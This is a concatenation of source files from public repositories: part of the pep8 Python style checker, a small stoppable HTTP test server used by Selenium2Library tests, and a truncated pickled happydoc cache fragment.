        finally:
            f.close()
    isidentifier = str.isidentifier

    def stdin_get_value():
        # Read stdin as text, ignoring undecodable bytes.
        return TextIOWrapper(sys.stdin.buffer, errors='ignore').read()
readlines.__doc__ = " Read the source code."
# Matches "# noqa" / "# nopep8" suppression comments (case-insensitive).
noqa = re.compile(r'# no(?:qa|pep8)\b', re.I).search
def expand_indent(line):
    r"""
    Return the amount of indentation.
    Tabs are expanded to the next multiple of 8.
    >>> expand_indent('    ')
    4
    >>> expand_indent('\t')
    8
    >>> expand_indent('    \t')
    8
    >>> expand_indent('       \t')
    8
    >>> expand_indent('        \t')
    16
    """
    # Fast path: with no tabs anywhere, the indent is just the count of
    # leading whitespace characters.
    if '\t' not in line:
        return len(line) - len(line.lstrip())
    width = 0
    for char in line:
        if char == ' ':
            width += 1
        elif char == '\t':
            # Jump to the next tab stop (multiples of 8).
            width = width // 8 * 8 + 8
        else:
            break
    return width
def mute_string(text):
    """
    Replace the contents of a string literal with 'x' characters so the
    checks cannot match text inside it.
    >>> mute_string('"abc"')
    '"xxx"'
    >>> mute_string("'''abc'''")
    "'''xxx'''"
    >>> mute_string("r'abc'")
    "r'xxx'"
    """
    quote = text[-1]
    # Skip any string prefix (e.g. u or r) plus the opening quote.
    body_start = text.index(quote) + 1
    body_end = len(text) - 1
    # Triple-quoted strings have two more quote characters on each side.
    if text[-3:] in ('"""', "'''"):
        body_start += 2
        body_end -= 2
    return text[:body_start] + 'x' * (body_end - body_start) + text[body_end:]
def parse_udiff(diff, patterns=None, parent='.'):
    """Return a dictionary of matching lines."""
    # For each file of the diff, the entry key is the filename,
    # and the value is a set of row numbers to consider.
    rv = {}
    path = nrows = None
    for line in diff.splitlines():
        if nrows:
            # Still inside a hunk: count down the remaining target-file
            # lines; '-' lines belong only to the source file.
            if line[:1] != '-':
                nrows -= 1
            continue
        if line[:3] == '@@ ':
            # Hunk header: extract target start row and row count
            # (a missing count defaults to 1).
            hunk_match = HUNK_REGEX.match(line)
            row, nrows = [int(g or '1') for g in hunk_match.groups()]
            rv[path].update(range(row, row + nrows))
        elif line[:3] == '+++':
            # New file section; strip an optional timestamp and the
            # conventional 'b/' prefix.
            path = line[4:].split('\t', 1)[0]
            if path[:2] == 'b/':
                path = path[2:]
            rv[path] = set()
    # Keep only files that have changed rows and match the patterns,
    # rebased onto 'parent'.
    return dict([(os.path.join(parent, path), rows)
                 for (path, rows) in rv.items()
                 if rows and filename_match(path, patterns)])
def filename_match(filename, patterns, default=True):
    """
    Check if patterns contains a pattern that matches filename.
    If patterns is unspecified, this always returns True.
    """
    if not patterns:
        return default
    # Shell-style matching against each pattern in turn.
    for pattern in patterns:
        if fnmatch(filename, pattern):
            return True
    return False
##############################################################################
# Framework to run all checks
##############################################################################
# Registry of check callables, keyed by the kind of argument they accept:
# per-physical-line checks, per-logical-line checks, and AST (tree) checks.
_checks = {'physical_line': {}, 'logical_line': {}, 'tree': {}}
def register_check(check, codes=None):
    """
    Register a new check object.

    Functions whose first argument is 'physical_line' or 'logical_line'
    are registered under that kind; classes whose __init__ takes
    (self, tree, ...) are registered as AST checks.  Error codes default
    to the E/W codes found in the check's docstring.
    """
    def _add_check(check, kind, codes, args):
        # Re-registering merges the new codes into the existing entry.
        if check in _checks[kind]:
            _checks[kind][check][0].extend(codes or [])
        else:
            _checks[kind][check] = (codes or [''], args)
    if inspect.isfunction(check):
        args = inspect.getargspec(check)[0]
        if args and args[0] in ('physical_line', 'logical_line'):
            if codes is None:
                # Harvest codes like 'E501'/'W601' from the docstring.
                codes = ERRORCODE_REGEX.findall(check.__doc__ or '')
            _add_check(check, args[0], codes, args)
    elif inspect.isclass(check):
        if inspect.getargspec(check.__init__)[0][:2] == ['self', 'tree']:
            _add_check(check, 'tree', codes, None)
def init_checks_registry():
    """
    Register all globally visible functions where the first argument name
    is 'physical_line' or 'logical_line'.
    """
    # Scan this very module for check functions.
    mod = inspect.getmodule(register_check)
    for (name, function) in inspect.getmembers(mod, inspect.isfunction):
        register_check(function)
# Populate the registry at import time.
init_checks_registry()
class Checker(object):
    """
    Load a Python source file, tokenize it, check coding style.

    Lines may come from a file, from stdin ('-' or filename=None), or be
    passed in directly via 'lines'.  check_all() drives the tokenizer and
    dispatches physical-line, logical-line and AST checks, reporting
    through the configured report object.
    """
    def __init__(self, filename=None, lines=None,
                 options=None, report=None, **kwargs):
        if options is None:
            # Build a default option set from the keyword arguments.
            options = StyleGuide(kwargs).options
        else:
            assert not kwargs
        self._io_error = None
        self._physical_checks = options.physical_checks
        self._logical_checks = options.logical_checks
        self._ast_checks = options.ast_checks
        self.max_line_length = options.max_line_length
        self.hang_closing = options.hang_closing
        self.verbose = options.verbose
        self.filename = filename
        if filename is None:
            self.filename = 'stdin'
            self.lines = lines or []
        elif filename == '-':
            self.filename = 'stdin'
            self.lines = stdin_get_value().splitlines(True)
        elif lines is None:
            try:
                self.lines = readlines(filename)
            except IOError:
                # Defer the error: it is reported as E902 when the
                # tokens are generated.
                exc_type, exc = sys.exc_info()[:2]
                self._io_error = '%s: %s' % (exc_type.__name__, exc)
                self.lines = []
        else:
            self.lines = lines
        if self.lines:
            ord0 = ord(self.lines[0][0])
            if ord0 in (0xef, 0xfeff):  # Strip the UTF-8 BOM
                if ord0 == 0xfeff:
                    # Decoded BOM (Python 3 text mode): one character.
                    self.lines[0] = self.lines[0][1:]
                elif self.lines[0][:3] == '\xef\xbb\xbf':
                    # Raw BOM bytes (Python 2): three characters.
                    self.lines[0] = self.lines[0][3:]
        self.report = report or options.report
        self.report_error = self.report.error
    def report_invalid_syntax(self):
        # Extract a (row, col) position from the exception when available.
        exc_type, exc = sys.exc_info()[:2]
        if len(exc.args) > 1:
            offset = exc.args[1]
            if len(offset) > 2:
                offset = offset[1:3]
        else:
            offset = (1, 0)
        self.report_error(offset[0], offset[1] or 0,
                          'E901 %s: %s' % (exc_type.__name__, exc.args[0]),
                          self.report_invalid_syntax)
    report_invalid_syntax.__doc__ = " Check if the syntax is valid."
    def readline(self):
        """
        Get the next line from the input buffer.
        """
        self.line_number += 1
        if self.line_number > len(self.lines):
            return ''
        return self.lines[self.line_number - 1]
    def readline_check_physical(self):
        """
        Check and return the next physical line. This method can be
        used to feed tokenize.generate_tokens.
        """
        line = self.readline()
        if line:
            self.check_physical(line)
        return line
    def run_check(self, check, argument_names):
        """
        Run a check plugin.
        """
        # Each check declares the Checker attributes it wants by name.
        arguments = []
        for name in argument_names:
            arguments.append(getattr(self, name))
        return check(*arguments)
    def check_physical(self, line):
        """
        Run all physical checks on a raw input line.
        """
        self.physical_line = line
        # Remember the first indent character seen (for W191/E101-style
        # consistency checks).
        if self.indent_char is None and line[:1] in WHITESPACE:
            self.indent_char = line[0]
        for name, check, argument_names in self._physical_checks:
            result = self.run_check(check, argument_names)
            if result is not None:
                offset, text = result
                self.report_error(self.line_number, offset, text, check)
    def build_tokens_line(self):
        """
        Build a logical line from tokens.

        Also builds self.mapping, which maps offsets in the logical line
        back to the originating tokens so errors can be located in the
        physical source.
        """
        self.mapping = []
        logical = []
        comments = []
        length = 0
        previous = None
        for token in self.tokens:
            token_type, text = token[0:2]
            if token_type == tokenize.COMMENT:
                comments.append(text)
                continue
            if token_type in SKIP_TOKENS:
                continue
            if token_type == tokenize.STRING:
                # Blank out string contents so checks cannot match them.
                text = mute_string(text)
            if previous:
                end_row, end = previous[3]
                start_row, start = token[2]
                if end_row != start_row:    # different row
                    prev_text = self.lines[end_row - 1][end - 1]
                    if prev_text == ',' or (prev_text not in '{[('
                                            and text not in '}])'):
                        logical.append(' ')
                        length += 1
                elif end != start:  # different column
                    # Preserve the exact whitespace between tokens.
                    fill = self.lines[end_row - 1][end:start]
                    logical.append(fill)
                    length += len(fill)
            self.mapping.append((length, token))
            logical.append(text)
            length += len(text)
            previous = token
        self.logical_line = ''.join(logical)
        # A '# noqa' in any comment suppresses errors for this line.
        self.noqa = comments and noqa(''.join(comments))
        # With Python 2, if the line ends with '\r\r\n' the assertion fails
        # assert self.logical_line.strip() == self.logical_line
    def check_logical(self):
        """
        Build a line from tokens and run all logical checks on it.
        """
        self.build_tokens_line()
        self.report.increment_logical_line()
        first_line = self.lines[self.mapping[0][1][2][0] - 1]
        indent = first_line[:self.mapping[0][1][2][1]]
        self.previous_indent_level = self.indent_level
        self.indent_level = expand_indent(indent)
        if self.verbose >= 2:
            print(self.logical_line[:80].rstrip())
        for name, check, argument_names in self._logical_checks:
            if self.verbose >= 4:
                print(' ' + name)
            for result in self.run_check(check, argument_names):
                offset, text = result
                if isinstance(offset, tuple):
                    # The check already supplied a (row, col) position.
                    orig_number, orig_offset = offset
                else:
                    # Map the logical-line offset back onto the last token
                    # that starts at or before it.
                    for token_offset, token in self.mapping:
                        if offset >= token_offset:
                            orig_number = token[2][0]
                            orig_offset = (token[2][1] + offset - token_offset)
                self.report_error(orig_number, orig_offset, text, check)
        self.previous_logical = self.logical_line
    def check_ast(self):
        # Run tree-based checks on the compiled AST of the whole source.
        try:
            tree = compile(''.join(self.lines), '', 'exec', PyCF_ONLY_AST)
        except (SyntaxError, TypeError):
            return self.report_invalid_syntax()
        for name, cls, _ in self._ast_checks:
            checker = cls(tree, self.filename)
            for lineno, offset, text, check in checker.run():
                if not noqa(self.lines[lineno - 1]):
                    self.report_error(lineno, offset, text, check)
    def generate_tokens(self):
        # Report a deferred read error (see __init__) as E902, then
        # stream tokens, running physical checks line by line.
        if self._io_error:
            self.report_error(1, 0, 'E902 %s' % self._io_error, readlines)
        tokengen = tokenize.generate_tokens(self.readline_check_physical)
        try:
            for token in tokengen:
                yield token
        except (SyntaxError, tokenize.TokenError):
            self.report_invalid_syntax()
    def check_all(self, expected=None, line_offset=0):
        """
        Run all checks on the input file.
        """
        self.report.init_file(self.filename, self.lines, expected, line_offset)
        if self._ast_checks:
            self.check_ast()
        self.line_number = 0
        self.indent_char = None
        self.indent_level = 0
        self.previous_logical = ''
        self.tokens = []
        self.blank_lines = blank_lines_before_comment = 0
        parens = 0
        for token in self.generate_tokens():
            self.tokens.append(token)
            token_type, text = token[0:2]
            if self.verbose >= 3:
                if token[2][0] == token[3][0]:
                    pos = '[%s:%s]' % (token[2][1] or '', token[3][1])
                else:
                    pos = 'l.%s' % token[3][0]
                print('l.%s\t%s\t%s\t%r' %
                      (token[2][0], pos, tokenize.tok_name[token[0]], text))
            if token_type == tokenize.OP:
                # Track bracket depth: NEWLINE/NL inside brackets do not
                # terminate a logical line.
                if text in '([{':
                    parens += 1
                elif text in '}])':
                    parens -= 1
            elif not parens:
                if token_type == tokenize.NEWLINE:
                    if self.blank_lines < blank_lines_before_comment:
                        self.blank_lines = blank_lines_before_comment
                    self.check_logical()
                    self.tokens = []
                    self.blank_lines = blank_lines_before_comment = 0
                elif token_type == tokenize.NL:
                    if len(self.tokens) == 1:
                        # The physical line contains only this token.
                        self.blank_lines += 1
                        self.tokens = []
                elif token_type == tokenize.COMMENT and len(self.tokens) == 1:
                    # Blank lines before a comment are credited to the
                    # following logical line, not swallowed by the comment.
                    if blank_lines_before_comment < self.blank_lines:
                        blank_lines_before_comment = self.blank_lines
                    self.blank_lines = 0
                    if COMMENT_WITH_NL:
                        # The comment also ends a physical line
                        self.tokens = []
        return self.report.get_file_results()
class BaseReport(object):
    """Collect the results of the checks."""
    # Subclasses set this to True to print each file name on first error.
    print_filename = False
    def __init__(self, options):
        self._benchmark_keys = options.benchmark_keys
        self._ignore_code = options.ignore_code
        # Results
        self.elapsed = 0
        self.total_errors = 0
        # Counters hold both benchmark keys and per-code error counts.
        self.counters = dict.fromkeys(self._benchmark_keys, 0)
        self.messages = {}
    def start(self):
        """Start the timer."""
        self._start_time = time.time()
    def stop(self):
        """Stop the timer."""
        self.elapsed = time.time() - self._start_time
    def init_file(self, filename, lines, expected, line_offset):
        """Signal a new file."""
        self.filename = filename
        self.lines = lines
        self.expected = expected or ()
        self.line_offset = line_offset
        self.file_errors = 0
        self.counters['files'] += 1
        self.counters['physical lines'] += len(lines)
    def increment_logical_line(self):
        """Signal a new logical line."""
        self.counters['logical lines'] += 1
    def error(self, line_number, offset, text, check):
        """Report an error, according to options."""
        code = text[:4]
        if self._ignore_code(code):
            return
        if code in self.counters:
            self.counters[code] += 1
        else:
            self.counters[code] = 1
            self.messages[code] = text[5:]
        # Don't care about expected errors or warnings
        if code in self.expected:
            return
        if self.print_filename and not self.file_errors:
            print(self.filename)
        self.file_errors += 1
        self.total_errors += 1
        # Returning the code tells subclasses the error was not filtered.
        return code
    def get_file_results(self):
        """Return the count of errors and warnings for this file."""
        return self.file_errors
    def get_count(self, prefix=''):
        """Return the total count of errors and warnings."""
        return sum([self.counters[key]
                    for key in self.messages if key.startswith(prefix)])
    def get_statistics(self, prefix=''):
        """
        Get statistics for message codes that start with the prefix.
        prefix='' matches all errors and warnings
        prefix='E' matches all errors
        prefix='W' matches all warnings
        prefix='E4' matches all errors that have to do with imports
        """
        return ['%-7s %s %s' % (self.counters[key], key, self.messages[key])
                for key in sorted(self.messages) if key.startswith(prefix)]
    def print_statistics(self, prefix=''):
        """Print overall statistics (number of errors and warnings)."""
        for line in self.get_statistics(prefix):
            print(line)
    def print_benchmark(self):
        """Print benchmark numbers."""
        print('%-7.2f %s' % (self.elapsed, 'seconds elapsed'))
        if self.elapsed:
            for key in self._benchmark_keys:
                print('%-7d %s per second (%d total)' %
                      (self.counters[key] / self.elapsed, key,
                       self.counters[key]))
class FileReport(BaseReport):
    """Collect the results of the checks and print only the filenames."""
    # Used for '--quiet': only the name of each offending file is shown.
    print_filename = True
class StandardReport(BaseReport):
    """Collect and print the results of the checks."""
    def __init__(self, options):
        super(StandardReport, self).__init__(options)
        # '--format' may be a named template or a custom format string.
        self._fmt = REPORT_FORMAT.get(options.format.lower(),
                                      options.format)
        self._repeat = options.repeat
        self._show_source = options.show_source
        self._show_pep8 = options.show_pep8
    def init_file(self, filename, lines, expected, line_offset):
        """Signal a new file."""
        # Errors are buffered and printed sorted in get_file_results().
        self._deferred_print = []
        return super(StandardReport, self).init_file(
            filename, lines, expected, line_offset)
    def error(self, line_number, offset, text, check):
        """Report an error, according to options."""
        code = super(StandardReport, self).error(line_number, offset,
                                                 text, check)
        # Without --repeat, only the first occurrence of a code is shown.
        if code and (self.counters[code] == 1 or self._repeat):
            self._deferred_print.append(
                (line_number, offset, code, text[5:], check.__doc__))
        return code
    def get_file_results(self):
        """Print the result and return the overall count for this file."""
        self._deferred_print.sort()
        for line_number, offset, code, text, doc in self._deferred_print:
            print(self._fmt % {
                'path': self.filename,
                'row': self.line_offset + line_number, 'col': offset + 1,
                'code': code, 'text': text,
            })
            if self._show_source:
                if line_number > len(self.lines):
                    line = ''
                else:
                    line = self.lines[line_number - 1]
                print(line.rstrip())
                # Caret marking the error column.
                print(' ' * offset + '^')
            if self._show_pep8 and doc:
                print(doc.lstrip('\n').rstrip())
        return self.file_errors
class DiffReport(StandardReport):
    """Collect and print the results for the changed lines only."""
    def __init__(self, options):
        super(DiffReport, self).__init__(options)
        # Mapping of filename -> set of changed line numbers (from the diff).
        self._selected = options.selected_lines
    def error(self, line_number, offset, text, check):
        # Silently drop errors on lines that the diff did not touch.
        if line_number not in self._selected[self.filename]:
            return
        return super(DiffReport, self).error(line_number, offset, text, check)
class StyleGuide(object):
    """Initialize a PEP-8 instance with few options."""
    def __init__(self, *args, **kwargs):
        # build options from the command line
        self.checker_class = kwargs.pop('checker_class', Checker)
        parse_argv = kwargs.pop('parse_argv', False)
        config_file = kwargs.pop('config_file', None)
        parser = kwargs.pop('parser', None)
        options, self.paths = process_options(
            parse_argv=parse_argv, config_file=config_file, parser=parser)
        if args or kwargs:
            # build options from dict
            options_dict = dict(*args, **kwargs)
            options.__dict__.update(options_dict)
            if 'paths' in options_dict:
                self.paths = options_dict['paths']
        self.runner = self.input_file
        self.options = options
        if not options.reporter:
            options.reporter = BaseReport if options.quiet else StandardReport
        # Normalize exclusion patterns (no trailing slash).
        for index, value in enumerate(options.exclude):
            options.exclude[index] = value.rstrip('/')
        options.select = tuple(options.select or ())
        if not (options.select or options.ignore or
                options.testsuite or options.doctest) and DEFAULT_IGNORE:
            # The default choice: ignore controversial checks
            options.ignore = tuple(DEFAULT_IGNORE.split(','))
        else:
            # Ignore all checks which are not explicitly selected
            options.ignore = ('',) if options.select else tuple(options.ignore)
        options.benchmark_keys = BENCHMARK_KEYS[:]
        options.ignore_code = self.ignore_code
        options.physical_checks = self.get_checks('physical_line')
        options.logical_checks = self.get_checks('logical_line')
        options.ast_checks = self.get_checks('tree')
        self.init_report()
    def init_report(self, reporter=None):
        """Initialize the report instance."""
        self.options.report = (reporter or self.options.reporter)(self.options)
        return self.options.report
    def check_files(self, paths=None):
        """Run all checks on the paths."""
        if paths is None:
            paths = self.paths
        report = self.options.report
        runner = self.runner
        report.start()
        try:
            for path in paths:
                if os.path.isdir(path):
                    self.input_dir(path)
                elif not self.excluded(path):
                    runner(path)
        except KeyboardInterrupt:
            # Ctrl-C aborts the run but still returns partial results.
            print('... stopped')
        report.stop()
        return report
    def input_file(self, filename, lines=None, expected=None, line_offset=0):
        """Run all checks on a Python source file."""
        if self.options.verbose:
            print('checking %s' % filename)
        fchecker = self.checker_class(
            filename, lines=lines, options=self.options)
        return fchecker.check_all(expected=expected, line_offset=line_offset)
    def input_dir(self, dirname):
        """Check all files in this directory and all subdirectories."""
        dirname = dirname.rstrip('/')
        if self.excluded(dirname):
            return 0
        counters = self.options.report.counters
        verbose = self.options.verbose
        filepatterns = self.options.filename
        runner = self.runner
        for root, dirs, files in os.walk(dirname):
            if verbose:
                print('directory ' + root)
            counters['directories'] += 1
            # Prune excluded subdirectories in place so os.walk skips them.
            for subdir in sorted(dirs):
                if self.excluded(subdir, root):
                    dirs.remove(subdir)
            for filename in sorted(files):
                # contain a pattern that matches?
                if ((filename_match(filename, filepatterns) and
                     not self.excluded(filename, root))):
                    runner(os.path.join(root, filename))
    def excluded(self, filename, parent=None):
        """
        Check if options.exclude contains a pattern that matches filename.
        """
        if not self.options.exclude:
            return False
        basename = os.path.basename(filename)
        if filename_match(basename, self.options.exclude):
            return True
        if parent:
            # Also test the path relative to the parent directory.
            filename = os.path.join(parent, filename)
        return filename_match(filename, self.options.exclude)
    def ignore_code(self, code):
        """
        Check if the error code should be ignored.
        If 'options.select' contains a prefix of the error code,
        return False. Else, if 'options.ignore' contains a prefix of
        the error code, return True.
        """
        return (code.startswith(self.options.ignore) and
                not code.startswith(self.options.select))
    def get_checks(self, argument_name):
        """
        Find all globally visible functions where the first argument name
        starts with argument_name and which contain selected tests.
        """
        checks = []
        for check, attrs in _checks[argument_name].items():
            (codes, args) = attrs
            # Keep the check if at least one of its codes is not ignored.
            if any(not (code and self.ignore_code(code)) for code in codes):
                checks.append((check.__name__, check, args))
        return sorted(checks)
def get_parser(prog='pep8', version=__version__):
    """Build and return the command-line option parser."""
    parser = OptionParser(prog=prog, version=version,
                          usage="%prog [options] input ...")
    # Options that may also be set from a configuration file section.
    parser.config_options = [
        'exclude', 'filename', 'select', 'ignore', 'max-line-length',
        'hang-closing', 'count', 'format', 'quiet', 'show-pep8',
        'show-source', 'statistics', 'verbose']
    parser.add_option('-v', '--verbose', default=0, action='count',
                      help="print status messages, or debug with -vv")
    parser.add_option('-q', '--quiet', default=0, action='count',
                      help="report only file names, or nothing with -qq")
    parser.add_option('-r', '--repeat', default=True, action='store_true',
                      help="(obsolete) show all occurrences of the same error")
    parser.add_option('--first', action='store_false', dest='repeat',
                      help="show first occurrence of each error")
    parser.add_option('--exclude', metavar='patterns', default=DEFAULT_EXCLUDE,
                      help="exclude files or directories which match these "
                           "comma separated patterns (default: %default)")
    parser.add_option('--filename', metavar='patterns', default='*.py',
                      help="when parsing directories, only check filenames "
                           "matching these comma separated patterns "
                           "(default: %default)")
    parser.add_option('--select', metavar='errors', default='',
                      help="select errors and warnings (e.g. E,W6)")
    parser.add_option('--ignore', metavar='errors', default='',
                      help="skip errors and warnings (e.g. E4,W)")
    parser.add_option('--show-source', action='store_true',
                      help="show source code for each error")
    parser.add_option('--show-pep8', action='store_true',
                      help="show text of PEP 8 for each error "
                           "(implies --first)")
    parser.add_option('--statistics', action='store_true',
                      help="count errors and warnings")
    parser.add_option('--count', action='store_true',
                      help="print total number of errors and warnings "
                           "to standard error and set exit code to 1 if "
                           "total is not null")
    parser.add_option('--max-line-length', type='int', metavar='n',
                      default=MAX_LINE_LENGTH,
                      help="set maximum allowed line length "
                           "(default: %default)")
    parser.add_option('--hang-closing', action='store_true',
                      help="hang closing bracket instead of matching "
                           "indentation of opening bracket's line")
    parser.add_option('--format', metavar='format', default='default',
                      help="set the error format [default|pylint|<custom>]")
    parser.add_option('--diff', action='store_true',
                      help="report only lines changed according to the "
                           "unified diff received on STDIN")
    # Testing options are only exposed when running from a checkout.
    group = parser.add_option_group("Testing Options")
    if os.path.exists(TESTSUITE_PATH):
        group.add_option('--testsuite', metavar='dir',
                         help="run regression tests from dir")
        group.add_option('--doctest', action='store_true',
                         help="run doctest on myself")
    group.add_option('--benchmark', action='store_true',
                     help="measure processing speed")
    return parser
def read_config(options, args, arglist, parser):
    """Read both user configuration and local configuration."""
    config = RawConfigParser()
    user_conf = options.config
    if user_conf and os.path.isfile(user_conf):
        if options.verbose:
            print('user configuration: %s' % user_conf)
        config.read(user_conf)
    # Walk up from the common prefix of the checked paths, looking for the
    # first directory that contains a project config file.
    parent = tail = args and os.path.abspath(os.path.commonprefix(args))
    while tail:
        if config.read([os.path.join(parent, fn) for fn in PROJECT_CONFIG]):
            if options.verbose:
                print('local configuration: in %s' % parent)
            break
        parent, tail = os.path.split(parent)
    pep8_section = parser.prog
    if config.has_section(pep8_section):
        # Map each option name to its type (or action, for flags).
        option_list = dict([(o.dest, o.type or o.action)
                            for o in parser.option_list])
        # First, read the default values
        new_options, _ = parser.parse_args([])
        # Second, parse the configuration
        for opt in config.options(pep8_section):
            if options.verbose > 1:
                print(" %s = %s" % (opt, config.get(pep8_section, opt)))
            if opt.replace('_', '-') not in parser.config_options:
                print("Unknown option: '%s'\n not in [%s]" %
                      (opt, ' '.join(parser.config_options)))
                sys.exit(1)
            normalized_opt = opt.replace('-', '_')
            opt_type = option_list[normalized_opt]
            # Use the typed getter matching the option's declared type.
            if opt_type in ('int', 'count'):
                value = config.getint(pep8_section, opt)
            elif opt_type == 'string':
                value = config.get(pep8_section, opt)
            else:
                assert opt_type in ('store_true', 'store_false')
                value = config.getboolean(pep8_section, opt)
            setattr(new_options, normalized_opt, value)
        # Third, overwrite with the command-line options
        options, _ = parser.parse_args(arglist, values=new_options)
    options.doctest = options.testsuite = False
    return options
def process_options(arglist=None, parse_argv=False, config_file=None,
                    parser=None):
    """Process options passed either via arglist or via command line args."""
    if not arglist and not parse_argv:
        # Don't read the command line if the module is used as a library.
        arglist = []
    if not parser:
        parser = get_parser()
    if not parser.has_option('--config'):
        if config_file is True:
            config_file = DEFAULT_CONFIG
        group = parser.add_option_group("Configuration", description=(
            "The project options are read from the [%s] section of the "
            "tox.ini file or the setup.cfg file located in any parent folder "
            "of the path(s) being processed. Allowed options are: %s." %
            (parser.prog, ', '.join(parser.config_options))))
        group.add_option('--config', metavar='path', default=config_file,
                         help="user config file location (default: %default)")
    options, args = parser.parse_args(arglist)
    options.reporter = None
    # ensure_value() guards against the Testing Options group being absent.
    if options.ensure_value('testsuite', False):
        args.append(options.testsuite)
    elif not options.ensure_value('doctest', False):
        if parse_argv and not args:
            if options.diff or any(os.path.exists(name)
                                   for name in PROJECT_CONFIG):
                # No explicit paths: default to the current directory.
                args = ['.']
            else:
                parser.error('input not specified')
        options = read_config(options, args, arglist, parser)
    # With a single -q from the command line, only print file names.
    options.reporter = parse_argv and options.quiet == 1 and FileReport
    # Split the comma-separated pattern/code lists into Python lists.
    options.filename = options.filename and options.filename.split(',')
    options.exclude = options.exclude.split(',')
    options.select = options.select and options.select.split(',')
    options.ignore = options.ignore and options.ignore.split(',')
    if options.diff:
        options.reporter = DiffReport
        stdin = stdin_get_value()
        options.selected_lines = parse_udiff(stdin, options.filename, args[0])
        args = sorted(options.selected_lines)
    return options, args
def _main():
    """Parse options and run checks on Python source."""
    pep8style = StyleGuide(parse_argv=True, config_file=True)
    options = pep8style.options
    if options.doctest or options.testsuite:
        # Self-test mode: only available from a source checkout.
        from testsuite.support import run_tests
        report = run_tests(pep8style)
    else:
        report = pep8style.check_files()
    if options.statistics:
        report.print_statistics()
    if options.benchmark:
        report.print_benchmark()
    if options.testsuite and not options.quiet:
        report.print_results()
    if report.total_errors:
        if options.count:
            sys.stderr.write(str(report.total_errors) + '\n')
        # Non-zero exit status signals that style errors were found.
        sys.exit(1)
if __name__ == '__main__':
    _main()
| brianbruggeman/git-hooks | pep8.py | Python | mit | 70,826 |
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/336012
import SimpleHTTPServer
import BaseHTTPServer
import httplib
import os
class StoppableHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """http request handler with QUIT stopping the server"""
    def do_QUIT(self):
        """send 200 OK response, and set server.stop to True"""
        self.send_response(200)
        self.end_headers()
        # serve_forever() in StoppableHttpServer polls this flag.
        self.server.stop = True
    def do_POST(self):
        # We could also process parameters here using something like below.
        # length = self.headers['Content-Length']
        # print self.rfile.read(int(length))
        # POST is treated exactly like GET for this test server.
        self.do_GET()
    def send_head(self):
        # This is ripped directly from SimpleHTTPRequestHandler,
        # only the cookie part is added.
        """Common code for GET and HEAD commands.
        This sends the response code and MIME headers.
        Return value is either a file object (which has to be copied
        to the outputfile by the caller unless the command was HEAD,
        and must be closed by the caller under all circumstances), or
        None, in which case the caller has nothing further to do.
        """
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            if not self.path.endswith('/'):
                # redirect browser - doing basically what apache does
                self.send_response(301)
                self.send_header("Location", self.path + "/")
                self.end_headers()
                return None
            # Serve an index file if one exists, else a directory listing.
            for index in "index.html", "index.htm":
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                return self.list_directory(path)
        ctype = self.guess_type(path)
        # Text files are opened in text mode, everything else as binary.
        if ctype.startswith('text/'):
            mode = 'r'
        else:
            mode = 'rb'
        try:
            f = open(path, mode)
        except IOError:
            self.send_error(404, "File not found")
            return None
        self.send_response(200)
        self.send_header("Content-type", ctype)
        # Caller is responsible for copying and closing the file object.
        fs = os.fstat(f.fileno())
        self.send_header("Content-Length", str(fs[6]))
        self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
        self.end_headers()
        return f
class StoppableHttpServer(BaseHTTPServer.HTTPServer):
    """http server that reacts to self.stop flag"""
    def serve_forever(self):
        """Handle one request at a time until stopped."""
        self.stop = False
        # The flag is flipped by StoppableHttpRequestHandler.do_QUIT;
        # the loop exits after the QUIT request has been handled.
        while not self.stop:
            self.handle_request()
def stop_server(port=7000):
    """send QUIT request to http server running on localhost:<port>"""
    # The custom QUIT verb is handled by StoppableHttpRequestHandler.
    conn = httplib.HTTPConnection("localhost:%d" % port)
    conn.request("QUIT", "/")
    conn.getresponse()
def start_server(port=7000):
    """Serve the parent directory of this script on localhost:<port>.

    Blocks until a QUIT request is received (see stop_server).
    """
    # Bug fix: 'sys' was previously only imported inside the
    # "if __name__ == '__main__'" block, so calling start_server() as a
    # library function raised NameError.  Import both modules locally.
    import os
    import sys
    # Serve files from the project root (one level above the script).
    os.chdir(os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), '..'))
    server = StoppableHttpServer(('', port), StoppableHttpRequestHandler)
    server.serve_forever()
if __name__ == '__main__':
    import sys
    # Exactly one argument is required: 'start' or 'stop'.
    if len(sys.argv) != 2 or sys.argv[1] not in [ 'start', 'stop' ]:
        print 'usage: %s start|stop' % sys.argv[0]
        sys.exit(1)
    if sys.argv[1] == 'start':
        start_server()
    else:
        stop_server()
| gotcha/Selenium2Library | test/resources/testserver/testserver.py | Python | apache-2.0 | 3,425 |
(S'd07b7bd90a798b2024e1f84c66405c0a'
p1
(ihappydoclib.parseinfo.moduleinfo
ModuleInfo
p2
(dp3
S'_namespaces'
p4
((dp5
(dp6
S'write_array'
p7
(ihappydoclib.parseinfo.functioninfo
FunctionInfo
p8
(dp9
g4
((dp10
(dp11
tp12
sS'_exception_info'
p13
(dp14
sS'_parameter_names'
p15
(S'f'
S'set'
p16
S'item_sep'
p17
S'nest_prefix'
p18
S'nest_suffix'
p19
S'nest_sep'
p20
tp21
sS'_parameter_info'
p22
(dp23
g16
(NNNtp24
sS'f'
(NNNtp25
sg17
(I1
NNtp26
sg19
(I1
NNtp27
sg18
(I1
NNtp28
sg20
(I1
NNtp29
ssS'_filename'
p30
S'Gnuplot/utils.py'
p31
sS'_docstring'
p32
S''
sS'_name'
p33
g7
sS'_parent'
p34
g2
sS'_comment_info'
p35
(dp36
sS'_configuration_values'
p37
(dp38
sS'_class_info'
p39
g10
sS'_function_info'
p40
g11
sS'_comments'
p41
S''
sbsS'float_array'
p42
(ihappydoclib.parseinfo.functioninfo
FunctionInfo
p43
(dp44
g4
((dp45
(dp46
tp47
sg13
(dp48
sg15
(S'm'
tp49
sg22
(dp50
S'm'
(NNNtp51
ssg30
g31
sg32
S''
sg33
g42
sg34
g2
sg35
g36
sg37
(dp52
sg39
g45
sg40
g46
sg41
S''
sbstp53
sS'_import_info'
p54
(ihappydoclib.parseinfo.imports
ImportInfo
p55
(dp56
S'_named_imports'
p57
(dp58
sS'_straight_imports'
p59
(lp60
sbsg30
g31
sg32
S''
sg33
S'utils'
p61
sg34
Nsg35
g36
sg37
(dp62
S'include_comments'
p63
I1
sS'cacheFilePrefix'
p64
S'.happydoc.'
p65
sS'useCache'
p66
I1
